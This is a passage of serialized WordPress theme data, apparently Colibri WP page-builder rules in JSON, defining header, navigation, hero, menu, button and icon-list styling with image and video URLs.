100%;\n}\n\n}\n\";s:5:\"rules\";s:88996:\"[{\"id\":1,\"type\":\"hop-header\",\"v\":\"1.1\",\"nodes\":[\"7-h1\"]},{\"id\":2,\"style\":{\"ancestor\":{\"sticky\":{\"background\":{\"color\":\"#ffffff\"},\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"10\"},\"bottom\":{\"path\":\"value\",\"value\":\"10\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"0\"},\"bottom\":{\"path\":\"value\",\"value\":\"0\"}}}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"spread\":\"0\",\"blur\":\"4\"}]}}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":20,\"unit\":\"px\"},\"bottom\":{\"path\":\"value\",\"value\":20,\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"0\"},\"bottom\":{\"path\":\"value\",\"value\":\"0\"}}}},\"background\":{\"color\":\"transparent\"}},\"type\":\"hop-navigation\",\"props\":{\"overlap\":true,\"sticky\":true,\"stickyStartAt\":\"immediately\",\"showTopBar\":false,\"width\":\"boxed\",\"layoutType\":\"logo-spacing-menu\"},\"v\":\"1.1\",\"nodes\":[\"7-h2\"]},{\"id\":3,\"props\":{\"containerWidth\":\"boxed\",\"layout\":{\"equalWidth\":false,\"itemsPerRow\":1,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"custom\":{\"horizontalGap\":{\"unit\":\"px\"},\"verticalGap\":{\"unit\":\"px\"},\"horizontalInnerGap\":{\"unit\":\"px\"},\"verticalInnerGap\":{\"unit\":\"px\"}}},\"media\":{\"mobile\":{\"layout\":{\"horizontalGap\":2,\"verticalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"7-h3\",\"10-h3\"]},{\"id\":4,\"props\":{\"verticalAlign\":\"center\",\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"type\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}}}},\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"7-h4\"]},{\"id\":5,\"type\":\"hop-logo\",\"props\":{\"horizontalTextAlign\":\"left\",\"media\":{\"mobile\":{\"horizontalTextAlign\":\"left\"}},\"layoutType\":\"text\"},\"v\":\"1.1\",\"nodes\":[\"7-h5\"],\"style\":{\"descendants\":{\"logo-text\":{\"typography\":{\"color\":\"${theme.colors.4}\"}},\"text\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"24\"}}}}}},{\"id\":6,\"style\":{\"padding\":{\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"},\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}},\"props\":{\"verticalAlign\":\"center\",\"hide\":{\"mobile\":true}},\"type\":\"hop-column\",\"nodeId\":\"7-h66\",\"v\":\"1.1\",\"nodes\":[\"7-h6\"]},{\"id\":7,\"type\":\"hop-spacer\",\"nodeId\":\"7-h78\",\"v\":\"1.1\",\"nodes\":[\"7-h7\",\"10-h7\"]},{\"id\":8,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"textAlign\":\"center\",\"media\":{\"mobile\":{\"textAlign\":\"center\"}},\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"7-h8\"]},{\"id\":9,\"type\":\"hop-horizontal-menu\",\"style\":{\"descendants\":{\"item\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"20\",\"unit\":\"px\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":0,\"unit\":\"px\"}}},\"link\":{\"typography\":{\"weight\":\"600\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"transform\":\"uppercase\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"em\",\"value\":\"1.5\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"0\"},\"color\":\"${theme.colors.4}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}}}},\"submenu\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"5\",\"color\":\"rgba(0, 0, 0, 0.04)\"}]}},\"submenu-item\":{\"background\":{\"color\":\"rgb(255, 255, 255)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu-item-link\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0|variant0}\"}},\"innerMenu\":{\"justifyContent\":\"flex-end\"}},\"ancestor\":{\"sticky\":{\"descendants\":{\"link\":{\"states\":{\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}}}},\"props\":{\"hoverEffect\":{\"type\":\"bordered-active-item bordered-active-item--bottom\",\"activeGroup\":\"border\",\"group\":{\"border\":{\"transition\":\"effect-borders-grow grow-from-center\"}},\"enabled\":true},\"sticky\":true,\"showOffscreenMenuOn\":\"has-offcanvas-tablet\"},\"v\":\"1.1\",\"nodes\":[\"7-h9\"]},{\"id\":10,\"type\":\"hop-mobile-menu\",\"nodeId\":\"11-h33\",\"v\":\"1.1\",\"nodes\":[\"7-h10\",\"10-h10\"]},{\"id\":11,\"type\":\"hop-offscreen-panel\",\"nodeId\":\"11-h34\",\"v\":\"1.1\",\"nodes\":[\"7-h11\",\"10-h11\"]},{\"id\":12,\"type\":\"hop-row\",\"nodeId\":\"11-h36\",\"v\":\"1.1\",\"nodes\":[\"7-h13\",\"10-h13\"]},{\"id\":13,\"type\":\"hop-column\",\"nodeId\":\"11-h37\",\"v\":\"1.1\",\"nodes\":[\"7-h14\",\"10-h14\"]},{\"id\":14,\"type\":\"hop-logo\",\"nodeId\":\"11-h38\",\"v\":\"1.1\",\"nodes\":[\"7-h15\",\"10-h15\"],\"props\":{\"layoutType\":\"text\"}},{\"id\":15,\"type\":\"hop-row\",\"nodeId\":\"11-h39\",\"v\":\"1.1\",\"nodes\":[\"7-h16\",\"10-h16\"]},{\"id\":16,\"type\":\"hop-column\",\"nodeId\":\"11-h40\",\"v\":\"1.1\",\"nodes\":[\"7-h17\",\"10-h17\"]},{\"id\":17,\"style\":{\"descendants\":{\"link\":{\"typography\":{\"color\":\"white\"}},\"submenu-item-link\":{\"typography\":{\"color\":\"white\"}},\"iconOption\":{\"typography\":{\"color\":\"white\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"white\"}}}},\"props\":{\"layout\":\"accordion\"},\"type\":\"hop-accordion-menu\",\"nodeId\":\"11-h35\",\"v\":\"1.1\",\"nodes\":[\"7-h12\",\"10-h12\"]},{\"id\":18,\"type\":\"hop-top-bar\",\"props\":{\"width\":\"boxed\"},\"v\":\"1.1\",\"nodes\":[\"7-h19\",\"10-h19\"]},{\"id\":19,\"style\":{\"background\":{\"color\":\"black\"},\"padding\":{\"top\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"unit\":\"px\",\"value\":\"15\"},\"bottom\":{\"value\":\"5\",\"unit\":\"px\"},\"left\":{\"unit\":\"px\",\"value\":\"15\"}}},\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"custom\":{\"horizontalGap\":{\"unit\":\"px\"},\"verticalGap\":{\"unit\":\"px\"},\"horizontalInnerGap\":{\"unit\":\"px\"},\"verticalInnerGap\":{\"unit\":\"px\"}}},\"fullBackground\":true,\"hide\":{\"mobile\":true}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"7-h20\",\"10-h20\"]},{\"id\":20,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"textAlign\":\"left\"},\"v\":\"1.1\",\"nodes\":[\"7-h21\",\"10-h21\"]},{\"id\":21,\"type\":\"hop-icon-list\",\"style\":{\"descendants\":{\"li\":{\"padding\":{\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}}},\"divider\":{\"border\":{\"left\":{\"width\":{\"value\":1,\"unit\":\"px\"}},\"bottom\":{\"width\":{\"value\":0,\"unit\":\"px\"}}},\"height\":{\"value\":100,\"unit\":\"%\"}},\"containerDivider\":{\"height\":{\"value\":100,\"unit\":\"%\"},\"width\":{\"value\":1,\"unit\":\"px\"},\"padding\":{\"left\":{\"value\":10,\"unit\":\"px\"},\"top\":{\"value\":0,\"unit\":\"px\"},\"right\":{\"value\":10,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}}},\"icon\":{\"width\":{\"path\":\"value\",\"value\":\"18\"},\"fill\":\"${theme.colors.4}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.4}\",\"background\":{\"color\":\"rgba(3, 169, 244, 0)\"}}},\"height\":{\"path\":\"value\",\"value\":\"18\"},\"border\":{\"top\":{\"style\":\"none\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}},\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"bottom\":{\"style\":\"none\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}},\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"}},\"padding\":{\"top\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"},\"left\":{\"value\":\"0\",\"unit\":\"px\",\"path\":\"value\"}}},\"text\":{\"margin\":{\"left\":{\"path\":\"value\",\"value\":\"5\"}},\"color\":\"${theme.colors.4}\",\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"}}},\"list-item\":{\"padding\":{\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}},\"horizontalAlign\":\"start\"}}},\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #1\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.15907223444395013},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #2\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.34341111083051734},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #3\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.0941660601972718},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #4\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.5295691579821964}],\"iconAndTextAlign\":\"center\",\"listLayout\":\"horizontal\"},\"v\":\"1.1\",\"nodes\":[\"7-h22\",\"10-h22\"]},{\"id\":22,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"7-h23\",\"10-h23\"]},{\"id\":23,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon-content\":{\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.4}\"}},\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"}},\"icon\":{\"margin\":{\"right\":{\"value\":\"0\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}}}},\"props\":{\"horizontalAlign\":\"end\",\"media\":{\"mobile\":{\"horizontalAlign\":\"center\"}},\"hide\":{\"mobile\":false}},\"v\":\"1.1\",\"nodes\":[\"7-h24\",\"10-h24\"]},{\"id\":24,\"style\":{\"typography\":{\"holders\":{\"h1\":{\"color\":\"${theme.colors.4}\"},\"h2\":{\"color\":\"${theme.colors.4}\"},\"h3\":{\"color\":\"${theme.colors.4}\"},\"h4\":{\"color\":\"${theme.colors.4}\"},\"h5\":{\"color\":\"${theme.colors.4}\"},\"h6\":{\"color\":\"${theme.colors.4}\"},\"p\":{\"color\":\"${theme.colors.4}\"}}},\"background\":{\"type\":\"image\",\"overlay\":{\"enabled\":true,\"type\":\"color\",\"gradient\":{\"angle\":\"-20\",\"steps\":[{\"color\":\"rgba(183,33,255, 0.4)\",\"position\":\"0\"},{\"color\":\"rgba(33,212,253, 0.4)\",\"position\":\"100\"}],\"name\":\"october_silence\"},\"shape\":{\"value\":\"none\",\"isTile\":false,\"img\":\"data:image\\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAALEgAACxIB0t1+\\/AAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAAAANSURBVAiZY\\/j\\/\\/z8DAAj8Av6Fzas0AAAAAElFTkSuQmCC\"},\"color\":{\"opacity\":0.4,\"value\":\"#000000\",\"opacity_\":40},\"light\":false},\"image\":[{\"source\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/header-scaled.jpg\",\"gradient\":{\"name\":\"october_silence\",\"angle\":0,\"steps\":[{\"position\":\"0\",\"color\":\"#b721ff\"},{\"position\":\"100\",\"color\":\"#21d4fd\"}]}},\"attachment\":\"scroll\",\"position\":\"center center\",\"repeat\":\"no-repeat\",\"size\":\"cover\",\"useParallax\":false}],\"color\":\"#03a9f4\",\"slideshow\":{\"duration\":{\"value\":1500},\"speed\":{\"value\":500},\"slides\":[{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/themes\\/colibri-wp\\/resources\\/images\\/beach-landscape-sea-water-nature-sand-1061655-pxhere.com.jpg\"},{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/themes\\/colibri-wp\\/resources\\/images\\/landscape-tree-water-nature-grass-outdoor-1327743-pxhere.com.jpg\"},{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/themes\\/colibri-wp\\/resources\\/images\\/leaf-nature-water-green-freshness-dew-1440543-pxhere.com.jpg\"}]},\"video\":{\"videoType\":\"external\",\"externalUrl\":\"https:\\/\\/www.youtube.com\\/watch?v=coYirc_qoSA\",\"internalUrl\":false,\"poster\":{\"url\":\"https:\\/\\/static.colibriwp.com\\/assets\\/sources\\/colibri-demo-video-cover.jpg\"}}},\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"200\",\"path\":\"value\"},\"bottom\":{\"unit\":\"px\",\"value\":\"200\",\"path\":\"value\"}},\"separatorBottom\":{\"enabled\":false,\"type\":\"mountains\",\"color\":\"#FFF\",\"height\":{\"value\":100},\"negative\":false}},\"props\":{\"heroSection\":{\"layout\":\"textOnly\",\"mediaType\":\"hop-image\"},\"attrs\":{\"name\":\"hero\",\"id\":\"hero\"},\"layoutType\":\"textWithMediaOnRight\"},\"type\":\"hop-hero\",\"v\":\"1.1\",\"nodes\":[\"7-h25\"]},{\"id\":25,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":3,\"verticalInnerGap\":3}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"7-h26\"]},{\"id\":26,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"right\":{\"style\":\"solid\"},\"bottom\":{\"style\":\"solid\",\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"left\":{\"style\":\"solid\"}},\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"v\":\"1.1\",\"nodes\":[\"7-h27\"]},{\"id\":27,\"props\":{\"headerType\":\"1\"},\"type\":\"hop-heading\",\"v\":\"1.1\",\"nodes\":[\"7-h28\"],\"style\":{\"typography\":{\"weight\":\"600\"},\"textAlign\":\"center\"}},{\"id\":28,\"props\":{\"type\":\"lead\"},\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"7-h29\"]},{\"id\":29,\"type\":\"hop-button-group\",\"v\":\"1.1\",\"nodes\":[\"7-h30\"]},{\"id\":30,\"style\":{\"background\":{\"color\":\"${theme.colors.0}\",\"type\":\"none\",\"image\":[{\"source\":{\"type\":\"gradient\",\"gradient\":{\"angle\":\"0\",\"steps\":[{\"color\":\"#00c6fb\",\"position\":\"0\"},{\"color\":\"#005bea\",\"position\":\"100\"}]}}}]},\"typography\":{\"color\":\"white\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"weight\":\"600\",\"transform\":\"uppercase\",\"lineHeight\":{\"value\":\"1\"},\"letterSpacing\":{\"value\":\"1\",\"unit\":\"px\"},\"family\":\"Open Sans\",\"margin\":{\"bottom\":\"2rem\"}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"56\",\"unit\":\"px\"},\"right\":{\"value\":\"56\",\"unit\":\"px\"}},\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"56\",\"unit\":\"px\"},\"right\":{\"value\":\"56\",\"unit\":\"px\"}},\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"left\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"right\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}}},\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"15\"},\"bottom\":{\"unit\":\"px\",\"value\":\"15\"},\"left\":{\"unit\":\"px\",\"value\":\"30\"},\"right\":{\"unit\":\"px\",\"value\":\"30\"}},\"descendants\":{\"icon\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"margin\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"}}}},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0|variant3}\"},\"border\":{\"top\":{\"color\":\"${theme.colors.0|variant3}\"},\"left\":{\"color\":\"${theme.colors.0|variant3}\"},\"right\":{\"color\":\"${theme.colors.0|variant3}\"},\"bottom\":{\"color\":\"${theme.colors.0|variant3}\"}}}},\"textAlign\":\"center\"},\"type\":\"hop-button\",\"props\":{\"buttonSize\":\"large\"},\"v\":\"1.1\",\"nodes\":[\"7-h31\"]},{\"id\":31,\"style\":{\"background\":{\"color\":\"transparent\"},\"typography\":{\"color\":\"white\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"weight\":\"600\",\"transform\":\"uppercase\",\"lineHeight\":{\"value\":\"1\"},\"letterSpacing\":{\"value\":\"1\",\"unit\":\"px\"},\"family\":\"Open Sans\",\"margin\":{\"bottom\":\"2rem\"}},\"border\":{\"top\":{\"color\":\"white\",\"radius\":{\"left\":{\"value\":\"56\",\"unit\":\"px\"},\"right\":{\"value\":\"56\",\"unit\":\"px\"}},\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"bottom\":{\"color\":\"white\",\"radius\":{\"left\":{\"value\":\"56\",\"unit\":\"px\"},\"right\":{\"value\":\"56\",\"unit\":\"px\"}},\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"left\":{\"color\":\"white\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"right\":{\"color\":\"white\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}}},\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"15\"},\"bottom\":{\"unit\":\"px\",\"value\":\"15\"},\"left\":{\"unit\":\"px\",\"value\":\"30\"},\"right\":{\"unit\":\"px\",\"value\":\"30\"}},\"descendants\":{\"icon\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"margin\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"}}}},\"states\":{\"hover\":{\"background\":{\"color\":\"rgba(255, 255, 255, 0.25)\"},\"border\":{\"top\":{\"color\":\"${theme.colors.4}\"},\"left\":{\"color\":\"${theme.colors.4}\"},\"right\":{\"color\":\"${theme.colors.4}\"},\"bottom\":{\"color\":\"${theme.colors.4}\"}}}},\"textAlign\":\"center\"},\"type\":\"hop-button\",\"props\":{\"buttonSize\":\"large\"},\"v\":\"1.1\",\"nodes\":[\"7-h32\"]},{\"id\":32,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"nodeId\":\"7-h35\",\"nodes\":[\"7-h33\"],\"v\":\"1.1\"},{\"id\":33,\"type\":\"hop-image\",\"nodeId\":\"7-h36\",\"nodes\":[\"7-h34\"],\"v\":\"1.1\",\"style\":{\"descendants\":{\"overlay\":{\"background\":{\"overlay\":{\"enabled\":false}}}}},\"props\":{\"enabledFrameOption\":true}},{\"id\":34,\"type\":\"hop-header\",\"nodeId\":\"4443-h1\",\"v\":\"1.1\",\"nodes\":[\"10-h1\"]},{\"id\":35,\"style\":{\"ancestor\":{\"sticky\":{\"background\":{\"color\":\"#ffffff\"},\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"10\"},\"bottom\":{\"path\":\"value\",\"value\":\"10\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"0\"},\"bottom\":{\"path\":\"value\",\"value\":\"0\"}}}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"spread\":\"0\",\"blur\":\"4\"}]}}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":20,\"unit\":\"px\"},\"bottom\":{\"path\":\"value\",\"value\":20,\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"0\"},\"bottom\":{\"path\":\"value\",\"value\":\"0\"}}}},\"background\":{\"color\":\"transparent\"}},\"type\":\"hop-navigation\",\"props\":{\"overlap\":true,\"sticky\":true,\"stickyStartAt\":\"immediately\",\"showTopBar\":false,\"width\":\"boxed\",\"layoutType\":\"logo-spacing-menu\"},\"v\":\"1.1\",\"nodes\":[\"10-h2\"],\"nodeId\":\"10-h2\"},{\"id\":36,\"props\":{\"containerWidth\":\"boxed\",\"layout\":{\"equalWidth\":false,\"itemsPerRow\":1,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"custom\":{\"horizontalGap\":{\"unit\":\"px\"},\"verticalGap\":{\"unit\":\"px\"},\"horizontalInnerGap\":{\"unit\":\"px\"},\"verticalInnerGap\":{\"unit\":\"px\"}}},\"media\":{\"mobile\":{\"layout\":{\"horizontalGap\":2,\"verticalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"7-h3\",\"10-h3\"]},{\"id\":37,\"props\":{\"verticalAlign\":\"center\",\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"type\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}}}},\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"10-h4\"],\"nodeId\":\"10-h4\"},{\"id\":38,\"type\":\"hop-logo\",\"props\":{\"horizontalTextAlign\":\"left\",\"media\":{\"mobile\":{\"horizontalTextAlign\":\"left\"}},\"layoutType\":\"text\"},\"v\":\"1.1\",\"nodes\":[\"10-h5\"],\"style\":{\"descendants\":{\"logo-text\":{\"typography\":{\"color\":\"${theme.colors.4}\"}},\"text\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"24\"}}}}},\"nodeId\":\"10-h5\"},{\"id\":39,\"style\":{\"padding\":{\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"},\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}},\"props\":{\"verticalAlign\":\"center\",\"hide\":{\"mobile\":true}},\"type\":\"hop-column\",\"nodeId\":\"10-h6\",\"v\":\"1.1\",\"nodes\":[\"10-h6\"]},{\"id\":40,\"type\":\"hop-spacer\",\"nodeId\":\"7-h78\",\"v\":\"1.1\",\"nodes\":[\"7-h7\",\"10-h7\"]},{\"id\":41,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"textAlign\":\"center\",\"media\":{\"mobile\":{\"textAlign\":\"center\"}},\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"10-h8\"],\"nodeId\":\"10-h8\"},{\"id\":42,\"type\":\"hop-horizontal-menu\",\"style\":{\"descendants\":{\"item\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"20\",\"unit\":\"px\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":0,\"unit\":\"px\"}}},\"link\":{\"typography\":{\"weight\":\"600\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"transform\":\"uppercase\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"em\",\"value\":\"1.5\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"0\"},\"color\":\"${theme.colors.4}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}}}},\"submenu\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"5\",\"color\":\"rgba(0, 0, 0, 0.04)\"}]}},\"submenu-item\":{\"background\":{\"color\":\"rgb(255, 255, 255)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu-item-link\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"rgb(255, 255, 